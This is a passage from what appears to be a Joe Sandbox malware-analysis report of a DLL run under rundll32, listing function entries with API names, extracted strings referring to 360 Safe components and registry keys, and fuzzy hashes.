18004d846 2924->2931 2932 18004d83c-18004d845 2924->2932 2925->2924 2926->2927 2927->2921 2928->2929 2933 18004d884-18004d88d 2929->2933 2934 18004d88e-18004d8a2 2929->2934 2931->2921 2932->2931 2933->2934 2935 18004d8a4-18004d8a7 2934->2935 2936 18004d8ae-18004d8b0 2934->2936 2935->2936 2936->2865
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle$File$Path$ExistsProcess$AppendCreateCriticalModuleNameSection$CodeControlCurrentDeviceEnterExitLeaveObjectResumeSingleThreadWait_cwprintf_s_l_mbsrchr_mbsstrmemset
                                                                                                  • String ID: "%s" %s authcode:$..\360netmgr64.exe$..\deepscan\360netmgr64.exe$cmd:
                                                                                                  • API String ID: 2520577183-130467596
                                                                                                  • Opcode ID: f46976dcb12b311a6e344114b892ee45deb341f71abb3c9660cb1fee63fdfb12
                                                                                                  • Instruction ID: 6457104f0d71b0fc63aa0499b97c1156928d9f47c8aaaaeb3038d31e222c5056
                                                                                                  • Opcode Fuzzy Hash: f46976dcb12b311a6e344114b892ee45deb341f71abb3c9660cb1fee63fdfb12
                                                                                                  • Instruction Fuzzy Hash: 7CE15272701E4986EB81DF69D89039D7360F789BE8F058626BA3D43AE4DF78C648C744
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005AC40 Relevance: 45.7, APIs: 18, Strings: 8, Instructions: 242COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Variant$Clear$Init
                                                                                                  • String ID: //root/config/item$install_first_open$name$pop_count$propoganda$tray_startup$update_first_open$value
                                                                                                  • API String ID: 3740757921-2166998829
                                                                                                  • Opcode ID: da0fe18e004557cc7b0f2f3d8356101b6c2bfabc220260c257d30514f78ba6f4
                                                                                                  • Instruction ID: aff580d4b75deea64deb7e46e4065f56afbdc634fa72071d76af76b76e89fc57
                                                                                                  • Opcode Fuzzy Hash: da0fe18e004557cc7b0f2f3d8356101b6c2bfabc220260c257d30514f78ba6f4
                                                                                                  • Instruction Fuzzy Hash: CDB12A72705A09DAFB95CF65D8903EC27B0FB49B99F149421FA0EA3A64DF35CA48C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018006442C Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 170libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CriticalSectionmemset$AppendPath$??3@CountEnterErrorFileFreeInitializeLastLeaveLibraryModuleNameSpin
                                                                                                  • String ID: ..\deepscan\$360Safe$360util$QueryFileCancel$QueryFileClose$QueryFileCreate$QueryFilesEx2$QuerySetOption$cloudcom2.dll
                                                                                                  • API String ID: 1015768321-2684063875
                                                                                                  • Opcode ID: 75acf276f5303c209b0e6b56f5e71fa6dc54d5f9daca34d9052b038fe3a01ebd
                                                                                                  • Instruction ID: 85df055bf9425c6c0da70963d94a526d831783e1f19dc8973dcfbc1a34099653
                                                                                                  • Opcode Fuzzy Hash: 75acf276f5303c209b0e6b56f5e71fa6dc54d5f9daca34d9052b038fe3a01ebd
                                                                                                  • Instruction Fuzzy Hash: B2818032301B8896EBA6DF21ED403D933A5FB497D4F548125EA5A0BBA4DF38D768C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180011308 Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 327COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Xinvalid_argumentstd::_$CriticalSection$EnterExceptionLeaveThrow
                                                                                                  • String ID: AddLog$CreateLog$Init$RemoveLog$Uninit$Util$dfafidjalkfjdalksjfjklfads$http://dr.f.360.cn/scan$list<T> too long
                                                                                                  • API String ID: 2114436830-3408081781
                                                                                                  • Opcode ID: 8af349b266fb6ce050c9f194d63605257150183307d7dbbaec6eeb8fed1cca8b
                                                                                                  • Instruction ID: 5b5dbdcf13791751e20e65a8e34bcc71763f118e9a5d889a3b3f781095819373
                                                                                                  • Opcode Fuzzy Hash: 8af349b266fb6ce050c9f194d63605257150183307d7dbbaec6eeb8fed1cca8b
                                                                                                  • Instruction Fuzzy Hash: D0E15A36201F489AEB9A9B51E8443D933A5F78CBD1F54C125EA6A477A5DF38C64EC300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800133B0 Relevance: 35.4, APIs: 13, Strings: 7, Instructions: 447COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmove$_wcsicmp$??3@HeapProcess
                                                                                                  • String ID: combo$ipartner$mid$pid$product$sysver$version
                                                                                                  • API String ID: 2498835641-470606306
                                                                                                  • Opcode ID: 533747f30ab3afd64085c7c3573a247adbb5a03214601c4fd458ee6f90e90daa
                                                                                                  • Instruction ID: 928f6af05c4b6ef931632149b6cf4c678087c366cc9f7bb4bb6152addef536b9
                                                                                                  • Opcode Fuzzy Hash: 533747f30ab3afd64085c7c3573a247adbb5a03214601c4fd458ee6f90e90daa
                                                                                                  • Instruction Fuzzy Hash: E712DC72700E4891EB92DB65C8423DD2761F748BE8F948222FA6D577A5DF78C68DC340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180066428 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 103registrylibraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Close$FreeLibraryOpenPathQueryValuememset$AddressAppendExistsFileHandleModuleProc
                                                                                                  • String ID: Init$Path$SOFTWARE\360Safe\360Ent$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$ServiceCall$\entclient\EntSvcCall_x64.dll
                                                                                                  • API String ID: 1498439332-702965266
                                                                                                  • Opcode ID: 7287dc7089829755e66462901955348d5673694c8cc533bc2c05e2a633cd80c9
                                                                                                  • Instruction ID: 4281fb2f7f8363f35efb0fd70a638a071d20137889dcc292f685ea46b841f4e2
                                                                                                  • Opcode Fuzzy Hash: 7287dc7089829755e66462901955348d5673694c8cc533bc2c05e2a633cd80c9
                                                                                                  • Instruction Fuzzy Hash: 74513E32614B4996EF918F20E8557DA73A0F7897C4F549116BA9F06A79EF38C74CCB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180024CD4 Relevance: 32.0, APIs: 6, Strings: 12, Instructions: 490COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcsstr$ExtensionFindPath_wcsicmp_wtoiwcschr
                                                                                                  • String ID: CLSID$InprocHandler$InprocHandler32$InprocServer$InprocServer32$LocalServer$LocalServer32$Server$ShellExecute$\\?\$gfffffff$gfffffff
                                                                                                  • API String ID: 3861457700-2318594275
                                                                                                  • Opcode ID: 1a717cbbda8cc80c3c9297c878bbbc669d8a73a80a9fe28ac877bfe538569426
                                                                                                  • Instruction ID: f5eaf3cd70d8a4233fc3eb4f5baabc932733307175318797ea3a634ab2d80fd0
                                                                                                  • Opcode Fuzzy Hash: 1a717cbbda8cc80c3c9297c878bbbc669d8a73a80a9fe28ac877bfe538569426
                                                                                                  • Instruction Fuzzy Hash: 3A12B672301A4886EB92DF39C8407DD23A1FB85BE5F44D211EA6D576E9EF78CA48C704
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180017114 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 278sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountTick$Sleep
                                                                                                  • String ID: ..\$..\cloudcom264.dll$..\deepscan\cloudcom264.dll$CreateObject
                                                                                                  • API String ID: 4250438611-3269604003
                                                                                                  • Opcode ID: b26729f86dd87614dde1f224353b88e55a5d4336fc5642cbf555589fae585a1a
                                                                                                  • Instruction ID: 779814ae67fce754565a54a050c1806dc9f81f57e114568d0bd2b2f20499cc86
                                                                                                  • Opcode Fuzzy Hash: b26729f86dd87614dde1f224353b88e55a5d4336fc5642cbf555589fae585a1a
                                                                                                  • Instruction Fuzzy Hash: 0CC16D72301F4882EB969B29D84479D33B1F788BE4F458215FA2E437A5EF38CA49C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180056DE8 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 118COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$_wcsicmp$AppendCriticalPathSectionValue$EnterFileLeaveModuleName
                                                                                                  • String ID: 360ExtHost$PCInfo$Partner$SOFTWARE\Wow6432Node\360EDRSensor$SOFTWARE\Wow6432Node\360EntSecurity$SOFTWARE\Wow6432Node\360SD$SOFTWARE\Wow6432Node\360Safe\Coop$ipartner$pid
                                                                                                  • API String ID: 3226263223-3142758636
                                                                                                  • Opcode ID: 628566989c82da212381fb3148179b37bd681cc2eaf5be604a1b5c7982e4b541
                                                                                                  • Instruction ID: 9533c192c26b347b8b9675f8c4be5ba0e6f9fe9a3a5b632a6bc0f6ba07ebb3e1
                                                                                                  • Opcode Fuzzy Hash: 628566989c82da212381fb3148179b37bd681cc2eaf5be604a1b5c7982e4b541
                                                                                                  • Instruction Fuzzy Hash: CF419D31A00A0C94FB96DB22A8403D963A4F74DBE4F909225FD28677A5EF39C74EC340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180044F64 Relevance: 30.1, APIs: 9, Strings: 8, Instructions: 320COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Count_cwprintf_s_lmemset$??3@Tickmemmove$??2@CriticalErrorHeapInitializeLastProcessSectionSpinrandsrand
                                                                                                  • String ID: 0=%s$360safe$DomainQuery$[%s]$com$mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%s$router$router:1
                                                                                                  • API String ID: 1789426470-3446598425
                                                                                                  • Opcode ID: 61786b1980ef7039dc4211af90e47e9a0e74f34993d56612bf85e9d061f4368c
                                                                                                  • Instruction ID: 6d6f9855de1d8c5247af129e1c82467daf937bd8777ee679c9f2b2c93b700a4d
                                                                                                  • Opcode Fuzzy Hash: 61786b1980ef7039dc4211af90e47e9a0e74f34993d56612bf85e9d061f4368c
                                                                                                  • Instruction Fuzzy Hash: D8D19132204F4882EB419B69D8803DE73A0F789BE5F108226BAAD477E5DF78C649C704
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004C034 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 112memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcscmp$Token$GlobalInformationProcess$AccountAllocCloseCurrentErrorFreeHandleLastLookupOpen
                                                                                                  • String ID: LOCAL SERVICE$NETWORK SERVICE$NT AUTHORITY$SYSTEM
                                                                                                  • API String ID: 3141378966-199577007
                                                                                                  • Opcode ID: 8d6976f719ecb46038f7faa6d62441ad30095ab4bbf55d005c38fee77e3359ad
                                                                                                  • Instruction ID: cee3605f7c7adaec53412b2e982fb153fefebb873c81ca2b5be3308eddbb09f0
                                                                                                  • Opcode Fuzzy Hash: 8d6976f719ecb46038f7faa6d62441ad30095ab4bbf55d005c38fee77e3359ad
                                                                                                  • Instruction Fuzzy Hash: F2517C32604B4986EBE28F14E8847DA73A5F78D7D8F518125EA5D436A4DF39C70DCB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018003AC1C Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 107COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AppendPath$FileModule$Namememset$AttributesHandle
                                                                                                  • String ID: ..\$..\deepscan\$bapi64.dll
                                                                                                  • API String ID: 2144934147-2390674060
                                                                                                  • Opcode ID: 9d5beebac642680a506550c8be48c190e39914ceb82cb04c52bb84f1375e2870
                                                                                                  • Instruction ID: 18b05e09174244348b6cef7f8f2b1baf28e5037f203e247325d4c6a64b139c1b
                                                                                                  • Opcode Fuzzy Hash: 9d5beebac642680a506550c8be48c190e39914ceb82cb04c52bb84f1375e2870
                                                                                                  • Instruction Fuzzy Hash: 6F514B32614A8882FBA3DB20EC443DA3361F78D7C9F859125E59A47AA5EF2DC74DC740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004872C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 318COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _cwprintf_s_l$??3@CountHeapProcessStringTickmemmoverandsrand
                                                                                                  • String ID: %d=%s$[%s]$com$mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%spid=%s
                                                                                                  • API String ID: 2740332460-2247268028
                                                                                                  • Opcode ID: 48d86df3b5eac7e439a35ff4fd84f198e4b1e974b1358ce155bcc0297089f372
                                                                                                  • Instruction ID: 80426b886386f52412969e15ba132e6e65bce95777886caa6ce0aa64614bcf94
                                                                                                  • Opcode Fuzzy Hash: 48d86df3b5eac7e439a35ff4fd84f198e4b1e974b1358ce155bcc0297089f372
                                                                                                  • Instruction Fuzzy Hash: 5FD1C172305F4886EB51DB29E88039E73A0FB88BE8F158625AE5D077A5DF78C549C704
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004F018 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 116COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp_wcsnicmp$wcsstr
                                                                                                  • String ID: Software\Classes\Wow6432Node$Software\Classes\Wow6432Node\$Software\Wow6432Node$Software\Wow6432Node\$Wow6432Node$Wow6432Node\$wow6432node
                                                                                                  • API String ID: 4199785700-2224805171
                                                                                                  • Opcode ID: bc25291bcc814f054e7e10840494f54f48fde9230fe93c8f0d5c0c6b2b3ad0be
                                                                                                  • Instruction ID: 173969ce7e51924b4f06bf421c606f91b3afd6de77e358442d966ae2f37bd097
                                                                                                  • Opcode Fuzzy Hash: bc25291bcc814f054e7e10840494f54f48fde9230fe93c8f0d5c0c6b2b3ad0be
                                                                                                  • Instruction Fuzzy Hash: 55517371710E48C1EBA6DB29D8843B923A1B789BE4F46C215EA39437E4DF68CB4CC745
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180014138 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 92COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FilePath$AppendExistsModuleNamememset$CriticalSection$EnterLeave
                                                                                                  • String ID: ..\360SkinMgr.exe$..\360sd.exe$..\safemon\360Cactus.tpi
                                                                                                  • API String ID: 2738204422-1657815065
                                                                                                  • Opcode ID: 78597d9bd975c32090d8355579ef8ffe821f8875940c9f43dd2c1350df723c28
                                                                                                  • Instruction ID: 05d3995d6e5afe1b7f2ff7eb98ba3dbe6d41cc5d548c72c66593806649a32fef
                                                                                                  • Opcode Fuzzy Hash: 78597d9bd975c32090d8355579ef8ffe821f8875940c9f43dd2c1350df723c28
                                                                                                  • Instruction Fuzzy Hash: 0E417131614A8D82EBE69B21EC953EA27A4F79D784F80C055F99E476A5DF2DC30DCB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800495A4 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 74COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
